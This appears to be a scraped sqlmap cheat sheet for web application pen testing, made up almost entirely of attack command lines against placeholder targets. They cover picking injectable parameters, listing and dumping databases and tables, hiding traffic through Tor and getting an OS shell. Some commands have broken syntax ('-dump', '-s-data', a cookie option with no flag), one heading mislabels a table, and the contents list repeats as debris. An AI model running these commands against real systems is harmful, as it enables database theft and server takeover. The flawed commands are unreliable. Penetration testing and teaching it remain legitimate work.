📕

sqlmap Cheat Sheet

Table of Content

Table of Content
Simple usage
Specify target DBMS to MySQL
Using a proxy
Specify PARAM1 to exploit
Use POST requests
Access with an authenticated session
Basic authentication
Evaluating response strings
List databases
List tables of database TARGET-DB
Dump table TARGET-SERVER of database TARGET-DB
List columns of table TARGET-TABLE of database TARGET-DB
Scan through TOR
Get OS Shell
Medium Post:

Simple usage

sqlmap -u “http://<TARGET-SERVER>/”

Specify target DBMS to MySQL

sqlmap -u “http://<TARGET-SERVER>/” --dbms=mysql

Using a proxy


sqlmap -u “http://<TARGET-SERVER>/” --proxy=http://<PROXY-ADDRESS>:<PORT>

Specify `PARAM1` to exploit

sqlmap -u “http://<TARGET-SERVER>/<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2>” -p <PARAM1>

Use `POST` requests


sqlmap -u “http://<TARGET-SERVER>/” --data=<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2>

Access with an authenticated session

sqlmap -u “http://<TARGET-SERVER>/” --data=<PARAM1>=<VALUE1>&<PARAM2>=value2 -p <PARAM1>cookie=’<COOKIE-VALUE>’

Basic authentication

sqlmap  -u “http://<TARGET-SERVER>/” -s-data=<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2> -p <PARAM1> --auth-type=basic --auth-cred=<USERNAME>:<PASSWORD>

Evaluating response strings

sqlmap -u “http://<TARGET-SERVER>/” --string=”This string if query is TRUE”

sqlmap -u “http://<TARGET-SERVER>/” --not-string=”This string if query is FALSE”

List databases

sqlmap -u “http://<TARGET-SERVER>/” --dbs

List tables of database `TARGET-DB`


sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> --tables

Dump table `TARGET-SERVER` of database `TARGET-DB`


sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> -T <TARGET-TABLE> -dump

List columns of table `TARGET-TABLE` of database `TARGET-DB`

sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> -T <TARGET-TABLE> --columns

Scan through TOR

sqlmap -u “http://<TARGET-SERVER>/” --tor --tor-type=SOCKS5

Get OS Shell

sqlmap -u “http://<TARGET-SERVER>/” --os-shell

Medium Post:

Cheat sheet for sqlmap

Here is a quick cheat sheet for Web application pen testing with sqlmap:. "Cheat sheet for sqlmap" is published by Akhil.

medium.com

sqlmap Cheat Sheet

Table of Content

Simple usage

Specify target DBMS to MySQL

Using a proxy

Specify PARAM1 to exploit

Use POST requests

Access with an authenticated session

Basic authentication

Evaluating response strings

List databases

List tables of database TARGET-DB

Dump table TARGET-SERVER of database TARGET-DB

List columns of table TARGET-TABLE of database TARGET-DB

Scan through TOR

Get OS Shell

Medium Post:

Cheat sheet for sqlmap

sqlmap Cheat Sheet

Table of Content

Simple usage

Specify target DBMS to MySQL

Using a proxy

Specify PARAM1 to exploit

Use POST requests

Access with an authenticated session

Basic authentication

Evaluating response strings

List databases

List tables of database TARGET-DB

Dump table TARGET-SERVER of database TARGET-DB

List columns of table TARGET-TABLE of database TARGET-DB

Scan through TOR

Get OS Shell

Medium Post:

Cheat sheet for sqlmap

Specify `PARAM1` to exploit

Use `POST` requests

List tables of database `TARGET-DB`

Dump table `TARGET-SERVER` of database `TARGET-DB`

List columns of table `TARGET-TABLE` of database `TARGET-DB`

Specify `PARAM1` to exploit

Use `POST` requests

List tables of database `TARGET-DB`

Dump table `TARGET-SERVER` of database `TARGET-DB`

List columns of table `TARGET-TABLE` of database `TARGET-DB`